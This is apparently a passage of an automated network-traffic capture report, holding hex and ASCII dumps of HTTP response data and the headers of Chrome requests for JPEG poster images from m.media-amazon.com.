                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 60 a1 52 49 65 5e 36 96 55 38 ed c1 5f a7 0b dc e4 9c ac 57 7a 9a b5 1c 44 e8 f1 86 c5 aa ab 7c ae 8a d0 d3 5e 2c b3 2c c5 02 51 45 a2 74 e2 ca 90 8c 61 36 3f 65 b3 ff 00 60 fa 47 9c c6 70 21 b3 15 24 ea 3b 64 f7 34 44 9f 1d b8 2a ca 51 49 ba 90 47 51 cd a8 c5 d4 50 da 33 7a e3 7c e3 86 93 25 78 36 8e 94 5e ea ee ea 46 b9 9d 49 1d 49 7a eb 4d 8b 14 cf d4 95 6a 6b 83 89 1a 6a 1c 56 c2 aa dc 7e 8c fd 19 d1 bc 34 18 38 f4 1b ba 77 e2 d9 62 aa 74 e9 b7 da d9 2e 3b 68 90 30 ef 4c f7 a9 41 dd b8 da 42 51 f7 0a 91 8f 8f 52 4f 8e 83 12 e9 b1 91 7e 8d 8b 58 86 cc 6b e5 73 62 e8 f5 72 f6 25 b4 87 55 a1 ce 13 f2 e9 af 5d 29 22 35 5c 5f ca a4 e5 13 17 27 29 6f d9 27 b9 2c b6 b6 74 39 20 2d d6 92 2d 51 d9 d4 9d d6 d1 9b 46 ba a7 ea 65 ed 62 63 ee b5 45 2b 59 70 3d ac
                                                                                                                                                                                          Data Ascii: `RIe^6U8_WzD|^,,QEta6?e`Gp!$;d4D*QIGQP3z|%x6^FIIzMjkjV~48wbt.;h0LABQRO~Xksbr%U])"5\_')o',t9 --QFebcE+Yp=
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 5a a5 26 40 a8 3c 9a db 7f 8b 36 46 a4 58 7b 22 63 2c 29 0a af e6 15 a2 42 a2 7c 6b 6b 89 4f f2 ab 26 ed 95 5a ff 00 8b ea bb 67 27 4d 8e 0c e9 b1 46 43 8d b9 d2 fd bb 1c 96 45 0f 8c 89 8e ae 9e 7c 85 b0 d9 c8 d9 36 99 64 6e 69 14 47 1b 64 e0 c7 06 84 45 5f 63 a0 88 2b 6c aa d6 f4 b4 dd 96 51 69 a7 5e f1 1a 34 1a 51 ff 00 4e cf d5 8d 37 29 a1 cc ea 0d 8b 71 a2 2f 4d 98 ea b6 3b be 6f a6 c4 2b df 66 cb 5c 7b 8d 23 49 6b 17 62 dc e5 ed 97 a6 69 29 bd 3b 9d 4b 93 a8 f8 cd c4 d0 cb 34 24 da ca f9 49 70 44 8e cc 94 77 3a 7f 9d 8d cd 43 b5 88 c5 3e 1e e4 91 a4 53 d2 46 a8 e4 39 26 58 5b 64 9d b9 24 68 b7 29 6a d9 36 96 ca d7 36 24 90 a1 72 ca 23 34 6d be 86 4a 5b d9 2d c8 fb 34 2e 4b 37 ce 9b 11 43 72 34 7e 5a 45 ef cb 20 43 de 5e 8b db 8d 52 44 77 e5 d3 34 7e
                                                                                                                                                                                          Data Ascii: Z&@<6FX{"c,)B|kkO&Zg'MFCE|6dniGdE_c+lQi^4QN7)q/M;o+f\{#Ikbi);K4$IpDw:C>SF9&X[d$h)j66$r#4mJ[-4.K7Cr4~ZE C^RDw4~
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: ed 1c 8d 5d 3e bb 87 0d 65 33 3d ba 16 b9 fb ad 56 6d f1 9a cd 5c fd 4c 92 2c 96 88 78 66 9e f6 5c 4a 0b 05 78 65 59 03 00 c0 9a 98 fc b1 55 e4 fb 76 d2 35 21 08 ca c5 3c 17 9d cf 88 e4 6a f2 3d 53 ba d7 0c 2c 6d 57 55 cf dd 6a b3 f0 35 c4 2f 36 2d 9d 84 5f 71 6a 47 ca 13 57 2d 99 9a b8 4f 12 dc 4d 87 cd 4e df 3c 75 74 07 a7 7d 4a fa 5c 4a 62 93 5c 68 dc ee 7c 07 23 5c 41 09 b9 90 57 0f 66 36 b1 96 ba 1f 31 ab 23 ec 35 c7 24 c4 71 a5 40 33 2a d3 7d b6 a9 cf ca d5 69 76 60 9d 24 a0 c0 80 44 e7 fe 84 ab a7 0b 6f 23 37 73 b8 f6 cd 98 23 27 94 d1 17 4c 03 d2 8d 71 1d 46 ed aa d2 5d 76 f1 9a ba 1f 2d 59 1f 6b 0a e3 87 ac 55 6f f7 41 a3 d5 33 53 1c c8 d4 aa 4b 00 23 52 b1 a8 37 07 fe 85 ab a7 55 b6 90 ba b0 2f ad ed a7 59 60 8d d3 94 b7 58 18 53 44 d5 f6 4d d4
                                                                                                                                                                                          Data Ascii: ]>e3=Vm\L,xf\JxeYUv5!<j=S,mWUj5/6-_qjGW-OMN<ut}J\Jb\h|#\AWf61#5$q@3*}iv`$Do#7s#'LqF]v-YkUoA3SK#R7U/Y`XSDM
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: eb a5 4c 43 8d 29 9a 13 b4 38 f5 96 99 8a 06 4d 80 44 98 c7 b3 74 a7 e4 11 19 4a c7 ca 4a 40 e7 ff 00 59 c6 6e d1 79 37 74 b6 e0 3e d6 bf 3a a3 61 10 65 56 67 d4 57 28 ba b3 60 88 8e c3 6a f6 8a 7b d8 b9 f4 b9 01 7b 12 35 98 3f ee 6c e8 0c c5 3d db a5 1f 32 c0 36 34 57 01 72 30 fc b6 f0 ef e3 5f 79 b6 fb 98 56 5d a0 f0 9b f3 ed 37 5d e2 7e 0e 98 9c 4a 6e 72 98 9f c6 ef c8 51 60 c1 c5 c9 c6 3e 4d de 29 47 3a 58 cf 0e f0 bf b1 b2 ad 2f ad 99 6d 9c ec 66 eb 8a 7e e6 e9 8f f3 a4 23 45 b7 8b f0 ac a3 e3 8e 15 ad 75 6f fd 0f 1b 7e 56 25 61 7f 8f 64 32 ec e3 f8 63 7d 62 53 72 d6 15 42 89 65 4b 61 74 6b 51 6b c7 28 02 a9 1b 96 6b 9b 6b a6 2f bc f4 a4 fe 54 9a 23 66 62 36 ea 02 63 9f b2 3f 6b 9e 6f 43 66 fc 47 b3 27 ea 98 78 88 3e 8c 96 5d 6d 79 15 d7 70 75 0c 37
                                                                                                                                                                                          Data Ascii: LC)8MDtJJ@Yny7t>:aeVgW(`j{{5?l=264Wr0_yV]7]~JnrQ`>M)G:X/mf~#Euo~V%ad2c}bSrBeKatkQk(kk/T#fb6c?koCfG'x>]mypu7
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: fb d4 df c2 6b 09 ac a7 33 6d c0 b1 a9 a5 9b 4b e8 4f 65 6f 53 5a 6c 6a 72 2f a1 73 c9 a4 76 99 a9 ef 53 95 7d 2b 9a b8 86 08 d4 ce 66 2b e9 4e 3c 43 0f 3c 36 94 4c 4b a2 de cb 1d d7 dd 14 64 d0 c7 4e 14 dc af 57 a3 fb 2b 3f 68 ba c1 77 45 08 e0 56 e9 f8 3d 60 d9 a2 8f b2 27 b2 b5 ec ad ac 50 08 2b d5 ea f4 10 41 60 82 bf 81 30 28 c7 ba 33 7d ea 19 31 57 f0 45 14 6b 94 62 68 61 29 ac 78 01 2e 26 7e d1 11 c6 88 a1 a4 45 1d 65 28 c0 d2 30 28 20 84 30 3c 00 e0 85 3c 60 78 31 54 7f 64 7f ff c4 00 28 10 00 02 01 03 03 03 05 01 01 01 01 00 00 00 00 00 00 01 11 21 31 41 10 51 61 71 81 91 20 a1 b1 c1 f0 d1 e1 f1 30 ff da 00 08 01 01 00 01 3f 21 7b 82 6e 46 9c 9c a6 cb 39 4e 72 5c 9c a7 31 06 47 62 74 b9 3d 17 36 b2 46 28 a6 45 a4 46 41 a0 dc 37 05 c0 c0 d0 7a 0d
                                                                                                                                                                                          Data Ascii: k3mKOeoSZljr/svS}+f+N<C<6LKdNW+?hwEV=`'P+A`0(3}1WEkbha)x.&~Ee(0( 0<<`x1Td(!1AQaq 0?!{nF9Nr\1Gbt=6F(EFA7z
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 8d 6f e5 7d 2d 58 09 3a 36 d2 29 23 45 6a dc c1 68 44 ee 94 43 80 77 3e c2 61 ee b4 ad fc 28 30 a2 bb d9 f9 b8 91 c1 d4 ab 76 a9 c6 44 42 c5 64 b6 dd 69 77 53 1d be 18 eb 38 dc 89 9c 4f 72 94 7c 31 36 b0 fc 99 35 14 2d 52 8d 27 40 df 07 9e 81 48 29 35 e2 e4 eb 9a 85 b6 96 14 31 10 48 4f 94 21 ab 12 50 9e d9 e0 44 4f 25 28 f3 d0 69 97 52 2c c5 b6 d0 a4 db 73 b5 87 5a 1c 26 af 87 42 01 b1 ec a5 2d 4f 92 09 92 d3 5c d6 9e 88 7a 32 8d 92 20 a1 34 c8 db 69 d1 7b 18 08 32 98 dc ad 2b 81 59 4f c2 16 a7 c3 4d 3d 9a d0 8a cd 83 c3 fe ce 92 48 d0 8e 59 22 68 27 aa 00 8e ac 5b 8a d7 04 23 68 55 ad e0 a9 c8 59 b3 22 94 d9 5b a7 64 33 70 8c 70 b6 30 bf d1 7f a4 10 f7 a7 e6 23 74 2d 70 62 fd 21 a1 05 09 41 32 54 52 3b 91 e9 59 7d dd 11 26 be bb 09 3f 2a 3e dd 8a b4 fa
                                                                                                                                                                                          Data Ascii: o}-X:6)#EjhDCw>a(0vDBdiwS8Or|165-R'@H)51HO!PDO%(iR,sZ&B-O\z2 4i{2+YOM=HY"h'[#hUY"[d3pp0#t-pb!A2TR;Y}&?*>
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: fb 87 ab b7 f4 25 3f 16 44 0c 85 77 20 dc a3 a4 8f 89 e8 f1 11 20 6c 72 77 48 7a 3f 4c df 44 ac 3d 0d ca 68 8b 0c 31 0e 12 c7 a1 5d e7 42 ca b9 42 d1 ff 00 7c 31 2a 7f 12 10 6d eb fa 23 1c e9 3e c1 f7 68 b2 cc 68 20 1e 49 fa 09 e8 95 9b eb ed 02 39 31 a8 13 69 99 d3 e5 d2 d6 8a f4 58 f0 27 70 51 cd ee 53 d3 65 f2 48 74 11 ac e9 dd c4 b2 31 3e e4 cd ee f4 7a 4c 9d 10 52 e4 6a b4 a0 f6 95 a3 e7 4b bd 4b 14 3e a1 2a 5e 83 ab a8 7d 16 a7 01 e5 8b 67 e0 f7 df cb 57 84 74 17 d6 8e 7d 51 68 74 d3 2c 2c 84 50 c2 75 71 5c 83 3a 63 42 cb 20 63 42 05 05 e4 ef 08 a4 b4 bb d5 69 72 d1 3c fd 9a 1d 27 47 8e 2f 93 22 a8 d7 da 3e 76 8c 8a b8 f7 32 e0 84 ee 7c c2 e4 5c 3d ca d0 34 8b 7c 5a 0d 96 12 b2 80 44 0d e8 75 24 59 e8 09 e1 b0 9d 45 ee 22 06 89 a0 12 c7 a3 b8 4e 18
                                                                                                                                                                                          Data Ascii: %?Dw lrwHz?LD=h1]BB|1*m#>hh I91iX'pQSeHt1>zLRjKK>*^}gWt}Qht,,Puq\:cB cBir<'G/">v2|\=4|ZDu$YE"N


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          119192.168.2.1649857151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:14 UTC413OUTGET /images/M/MV5BMjA5OTk3OTQzOF5BMl5BanBnXkFtZTcwNDcyODkyMQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:14 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 32436
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 9ae1ada0-87b6-4e31-ab7c-bc1a18aa2fa6
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sun, 16 Mar 2008 00:09:41 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 03 Nov 2044 22:40:13 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2236491
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:14 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000092-IAD, cache-ewr-kewr1740026-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 01 db 01 07 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 ff c4 00 4b 10 00 01 03 03 02 04 04 04 03 07 01 05 04 08 07 00 01 02 03 11 00 04 21 05 31 06 12 41 51 13 61 71 f0 22 81 91 a1 07 14 b1 15 23 32
                                                                                                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"K!1AQaq"#2
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: d2 95 03 04 28 c1 9e c4 1c 8a 54 01 81 26 ac 4d 3e 98 a9 a0 fc 45 f3 47 32 be bf de 87 8a b0 72 b2 23 70 7a 51 6d 8d ba e3 ef 45 18 18 81 d3 14 c4 28 29 4a dc e6 85 00 09 a1 40 0e c1 11 83 3f 4f 7b 52 4e dd 69 63 78 18 3f cf a5 06 d1 e2 b8 53 cd ca 9d e6 3d e6 a3 29 28 ab 7d 13 84 1c da 8a 1b 48 52 d5 c8 80 49 f2 e9 e7 e9 56 2c 5a 78 4a 92 79 96 36 23 21 3e 5f de 9c b7 61 08 05 28 05 20 80 09 22 49 f9 d4 94 81 00 62 08 eb e9 d6 b8 7a bd 7b 95 c6 1d 1e 97 45 e9 51 c7 53 c9 cb 1b 4b 09 04 a8 80 54 72 49 a5 94 82 0a 54 99 41 dc 19 cf cc 1e 94 e0 c0 c9 38 f7 fa d3 0f ba 1a 6c a8 ec 91 24 fc ab 99 6e 4c ec 38 c6 31 fc 19 8d 41 b4 5b 5c bb 6e e2 89 42 48 2d 2b 12 04 98 98 f2 33 f2 aa b7 50 10 e1 09 3c c8 07 06 22 af f8 a7 4d bb b3 36 ef 5d b9 6e 16 e2 12 52 d2
                                                                                                                                                                                          Data Ascii: (T&M>EG2r#pzQmE()J@?O{RNicx?S=)(}HRIV,ZxJy6#!>_a( "Ibz{EQSKTrITA8l$nL81A[\nBH-+3P<"M6]nR
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: a7 d8 dd 36 a1 73 64 c3 c0 c0 25 6d 0d bd 62 9a 9c d7 4c 7b f0 4f f5 42 8e 60 e7 0f 7e 1a df 95 06 2f 6f 2c 08 41 82 5e 57 28 3d e1 60 89 f2 9f 4a 64 7e 17 68 b7 5c 8b d3 f8 ad b5 73 02 40 79 b4 2a 60 9f f9 54 08 f4 8a e8 6e f0 86 80 f2 82 97 a5 30 92 24 fc 04 89 c7 91 8a c2 71 a6 81 a7 69 9a 9d 95 b5 85 a1 6d cb 90 4a 81 51 20 8e 60 90 00 3b 75 ab 3e a7 2c 57 62 86 9f 06 57 51 b4 cc 67 14 f0 95 c7 0a 5c 5a b2 ed e5 bb ff 00 98 42 9c 6d 6c f3 60 03 19 07 be 68 55 cf e2 bb 80 f1 7b 76 e1 b6 d2 2d 6c 9a 68 01 90 70 55 ff 00 d5 f6 a1 5d 7c 2e 52 82 6c e5 ce 29 4a 8c 59 dc c4 c6 41 8d a9 00 4e 06 09 10 23 a1 a7 14 90 6f bc 10 a1 ca 00 e6 92 32 7d 7e 95 21 f6 03 2d f3 86 81 4a 48 52 a0 e4 a6 64 c7 7c 0a cf 93 5b 8d 3d ad 5a 3a 18 fd 3f 34 96 e4 ea 87 ac 1f f1
                                                                                                                                                                                          Data Ascii: 6sd%mbL{OB`~/o,A^W(=`Jd~h\s@y*`Tn0$qimJQ `;u>,WbWQg\ZBml`hU{v-lhpU]|.Rl)JYAN#o2}~!-JHRd|[=Z:?4
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 00 c8 c9 1f 5f 2a 9f a9 6a 36 da 6e 9c fd f3 ea 25 86 12 0a b9 00 2a 02 62 20 75 9f ad 72 f1 a8 b8 fd e5 f3 b6 8e f8 2f ea d7 bf 96 0b 49 1c c8 68 41 30 77 12 54 9f a6 3b 55 fe 8b 60 d5 ce bf ae 2a d5 80 e6 9b 6c 84 b2 86 96 a2 12 e3 c8 12 09 cc 13 20 cf a8 ef 42 92 f0 47 2e 8d 45 26 fe 3f e7 fc fc 1b 86 5c 4d c3 0c ba 94 a8 25 d4 85 00 52 01 c8 90 08 f9 d3 9c 89 53 63 94 24 02 06 c3 61 e4 6b 09 c3 3a 8d de a3 c4 0d a6 f3 54 bb 62 e5 a0 a5 5c 58 3a 80 10 a4 81 1f 0c 00 40 04 83 07 a7 53 5b e1 3c bf 0c 46 e3 d3 1d aa 77 66 3c d8 bd b9 6d 10 52 00 81 88 00 c5 05 00 04 91 81 8e e6 29 5f 11 c1 20 c6 c4 7d 28 72 9e 50 37 88 06 0c fd fd ef 4e ca 78 f0 34 40 52 49 24 88 31 9e dd 7d 2b 9b 71 0a 05 ff 00 e2 5d 8d b1 59 3c 81 94 28 02 48 06 4a 88 1d ba 57 4a 52 14
                                                                                                                                                                                          Data Ascii: _*j6n%*b ur/IhA0wT;U`*l BG.E&?\M%RSc$ak:Tb\X:@S[<Fwf<mR)_ }(rP7Nx4@RI$1}+q]Y<(HJWJR
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: b8 f5 ac 1b bc 4f a9 5a ea da 95 bb 4e a1 eb 5d 35 a5 72 f8 89 03 98 88 1f 11 03 30 64 01 b9 3e 95 26 c7 8d 6e 9c fd 94 d3 b6 68 5b d7 8b 29 5a 90 a8 02 0c 18 04 4e 06 f4 f7 c7 c9 43 d0 e5 4b 72 e8 d1 3f c3 ba 4b ed 25 85 e9 d6 c9 6c 2f c4 09 4b 7c b0 ae 8a 1c b1 9f 9d 29 ed 0a c9 dd 21 7a 43 68 2c 5a a8 64 30 79 08 33 32 0e e4 f7 26 66 ab af f8 d2 c2 cd 0f 3a 86 6e 2e 58 b7 74 34 eb ed 47 28 51 ff 00 48 93 f1 11 89 8d aa 45 c7 17 68 96 cf 35 6f 75 79 e1 3c ef 28 f0 ca 14 4a 49 c8 04 81 00 e7 6a 7e 4a dc 73 b5 7c 8e 69 bc 38 c6 96 fa 6e 15 77 75 77 70 96 8b 29 b8 b9 50 52 90 82 a0 4a 44 01 bc 75 93 56 ea 00 cc 4e 4e fb 4e ff 00 cb f9 50 04 72 f3 89 20 80 00 f2 f7 de 8e 09 26 0e 41 33 3b f7 a7 e4 a2 52 94 9f dd d8 92 01 d9 31 11 00 7a ed eb 43 94 04 9f 88
                                                                                                                                                                                          Data Ascii: OZN]5r0d>&nh[)ZNCKr?K%l/K|)!zCh,Zd0y32&f:n.Xt4G(QHEh5ouy<(JIj~Js|i8nwuwp)PRJDuVNNNPr &A3;R1zC
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 6e 97 1f 69 0d f3 a9 4a 0a 04 a9 5c a4 e0 83 03 e6 66 9f d3 14 ed d6 be 97 34 d2 e3 ac 5d 3f cf 79 61 79 6f fe ea 64 95 49 11 8c 41 19 e9 5a 1b 3f c4 2d 01 e2 79 d7 76 c4 4f f1 b2 55 39 cc 14 ce d5 69 6f c5 9a 05 c4 25 bd 66 d7 9e 27 f7 aa f0 cc 6e 64 a8 0f d6 a3 b3 9e 19 74 f5 39 54 6a 50 ff 00 8c b7 06 4a 8c 28 98 19 11 1b f4 14 b2 91 be 7c f3 bd 30 cd cb 37 21 0e db dc b4 f3 6a 18 2d b8 95 03 e6 08 39 a7 fa 99 98 8e a7 07 35 63 b3 9a d3 f2 21 45 40 80 00 82 7b 48 02 81 20 a6 48 04 1e 80 66 89 44 40 3c c0 9d 84 1e b4 6a 33 f1 60 11 20 19 cc f6 8a 28 46 7b 8d 6e 0b 5c 1f aa 2d 01 27 9d 90 cc 1e cb 50 49 fb 12 7e 55 80 58 2c 7e 18 3e a0 94 05 5e 6a 41 00 91 04 a5 24 09 8e b1 06 b5 bf 89 0f f8 5c 34 c3 21 24 87 af 10 09 04 40 09 0a 56 7e 60 56 43 5c fd c7
                                                                                                                                                                                          Data Ascii: niJ\f4]?yayodIAZ?-yvOU9io%f'ndt9TjPJ(|07!j-95c!E@{H HfD@<j3` (F{n\-'PI~UX,~>^jA$\4!$@V~`VC\
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: f8 df 8a 6c 52 05 be bf 78 12 09 30 e2 c2 c1 fa 83 55 4b d3 e6 bf 4c 89 7d 6c 5d 39 41 1a de 2b e2 e7 b8 86 cd 86 d7 64 bb 4f cb 97 16 a0 54 4f 32 88 e5 11 80 71 9f ad 44 fc 4b bc 5d 95 fe 85 a7 30 fa c1 b5 d3 11 cc 94 81 00 98 03 71 d9 26 a0 b5 f8 a7 c4 e1 0b 45 ca ac 6e c2 a2 03 d6 c0 c7 d3 d2 a8 f8 9b 88 6e 78 9b 58 56 a5 74 d3 6d b8 5a 4b 5c ad c9 00 26 73 9c c9 24 9a 78 74 52 8c ee 7c a6 4b 36 bb 74 23 1c 6b 6d 10 ce a3 79 3f f1 2b f5 84 ff 00 4a 15 0f 9b a1 22 7e 94 2b 6f d2 e1 ff 00 49 9f eb b5 1f eb 63 89 22 06 37 19 a4 ba 02 c6 d2 0f 4e f4 a4 81 03 00 98 a2 57 7f 7e f7 ab 9c 53 4d 3f 26 44 da 69 ae c6 cb d7 25 a2 c1 5a 5b 64 47 31 49 f8 94 3b 13 d0 7a 45 1d 8d c3 7a 6e a9 6c a2 3c 3b 74 99 75 c0 90 4a 41 91 cc 07 52 26 40 ee 28 e7 15 1a e5 80 e8
                                                                                                                                                                                          Data Ascii: lRx0UKL}l]9A+dOTO2qDK]0q&EnnxXVtmZK\&s$xtR|K6t#kmy?+J"~+oIc"7NW~SM?&Di%Z[dG1I;zEznl<;tuJAR&@(
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 80 7c fc ab 72 69 ab 45 3c a7 4c 30 00 1d 26 85 14 9a 15 2a 15 8e 8f e1 18 34 92 7a 9d e9 58 81 be dd e9 30 3b 52 18 47 13 49 d8 cc fa e3 3d 69 47 6a 4c e3 31 df 1e f3 40 0e 30 56 87 02 9b 49 24 64 81 9c 01 e7 51 ef c2 dd 21 4a 42 12 06 24 a8 08 99 c6 f4 e4 91 b1 23 6d a9 9f d9 aa 73 e2 8f 84 92 63 e7 f6 de b9 ba ec 69 35 36 ce 96 86 72 94 5e 34 ac 79 8b b7 1a 68 27 99 90 22 01 e7 00 8f 2c ed 50 ee 8a dd 70 38 1e 6c 28 19 04 2c 08 23 d2 9f fd 90 a1 bc 63 06 9c 1a 39 20 0e 5c cc 62 b9 db a0 9f 67 49 c3 2c a2 a3 b4 b2 b2 bd 4d d3 49 0e 11 e3 80 01 03 3c c3 a1 9e f0 29 ab e7 39 dd 4a 13 20 24 49 cf 53 51 4d a1 b1 5a 54 15 1c e3 10 76 8c 9f d6 82 dc 52 d4 56 a2 01 39 33 b4 77 fa 4d 6d d2 69 56 f5 95 74 66 d6 eb 67 ed bc 32 55 24 4b d2 90 eb 9a bd 9a 58 69 2e
                                                                                                                                                                                          Data Ascii: |riE<L0&*4zX0;RGI=iGjL1@0VI$dQ!JB$#msci56r^4yh'",Pp8l(,#c9 \bgI,MI<)9J $ISQMZTvRV93wMmiVtfg2U$KXi.
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 51 5e 5e 96 96 83 ac 27 c3 50 12 10 b6 be 20 4c 08 26 4e 77 cd 51 dc ea 6f 8d 44 2d 4c a2 e6 d1 b8 29 6d 4b 28 54 8d c8 20 67 c8 1c 54 e1 9a 2d 72 f9 2b cb a7 6e 4f 64 69 23 56 00 20 15 12 48 19 a2 88 12 3a 9c d3 16 ba a5 8d ea 82 59 ba 4a 5e 54 43 0e 1e 55 03 b4 67 07 7e 86 a5 b8 14 85 14 29 24 14 90 08 22 0e 3b d5 c9 a6 ad 18 e4 9a 74 d5 0c 10 09 93 82 71 8d fa ed 49 11 24 e0 cc ef b1 f7 31 f3 a5 90 41 26 30 73 03 d3 fb 51 28 4e 20 ce 33 d2 3d cd 3e 05 42 08 11 f1 02 7a 03 39 fb fb da 93 00 02 54 20 6e 47 9e 3f af bd e9 c5 08 02 40 1e 43 03 ae 29 30 20 80 7d 3c 8f 7f ed 4c 28 6a 04 e0 49 22 2a df 86 ef 4d bd c3 96 0e 98 fc c1 2e 34 00 c0 58 10 a0 27 b8 13 ea 0f 7a ab 80 08 89 ce e6 7e b4 1d 0b f8 16 d1 29 71 a5 78 8d a8 18 85 01 23 1d ba 52 e0 94 5b 8b
                                                                                                                                                                                          Data Ascii: Q^^'P L&NwQoD-L)mK(T gT-r+nOdi#V H:YJ^TCUg~)$";tqI$1A&0sQ(N 3=>Bz9T nG?@C)0 }<L(jI"*M.4X'z~)qx#R[
                                                                                                                                                                                          2024-12-15 11:38:14 UTC1378INData Raw: 7a cb 66 e4 00 20 26 e5 ac 2d 23 a7 c4 85 03 de 41 a9 24 4a 66 20 47 a0 3e 9e fb f9 d3 69 78 39 22 37 cc c8 eb d7 df f6 a5 24 36 86 dc 79 e5 a5 96 1a 49 5b ae 2b 64 81 03 e6 4c 88 03 3e 54 82 08 26 44 46 76 83 ef df a1 5f bf 69 6b c3 b7 af ea 28 52 ed 52 a6 c1 40 24 15 28 10 52 93 d8 12 05 55 92 4e 2b 82 50 49 b4 98 db 97 e5 e6 6e 93 a6 31 2a 61 41 2b 79 d7 02 4a 41 4f 34 f2 91 fc 39 39 31 9d e2 b9 fd d7 11 5d d8 6a 33 ff 00 69 ee 6e 1c 42 c2 92 eb 60 94 b5 13 28 e5 9e 45 03 89 dc 62 97 7b 7d ab 71 6b a1 fb bb 95 21 97 55 0d 5a a0 84 a5 52 62 54 44 48 9e 86 9c e2 8e 11 63 43 3e 00 bd b2 7a e1 29 21 c6 59 05 2b 6c 8e a4 19 04 6f 9e b4 61 8b 8b b6 ec b3 2e 68 f5 15 d1 71 a3 71 4d 97 12 ea c2 d6 ee d8 b4 e1 48 36 cc 82 14 ca 96 04 ac a8 44 f3 1d d2 32 07 4c
                                                                                                                                                                                          Data Ascii: zf &-#A$Jf G>ix9"7$6yI[+dL>T&DFv_ik(RR@$(RUN+PIn1*aA+yJAO4991]j3inB`(Eb{}qk!UZRbTDHcC>z)!Y+loa.hqqMH6D2L


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          120192.168.2.1649861151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:14 UTC453OUTGET /images/M/MV5BYTk3OWJmZWUtYmZmZi00YmI5LWE4ZWQtODE0YjI0Mzk4MDkxL2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:14 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 42582
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 80fdc606-f3a4-4ec7-a959-2af4536f26c5
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 18 Jan 2017 21:14:09 GMT
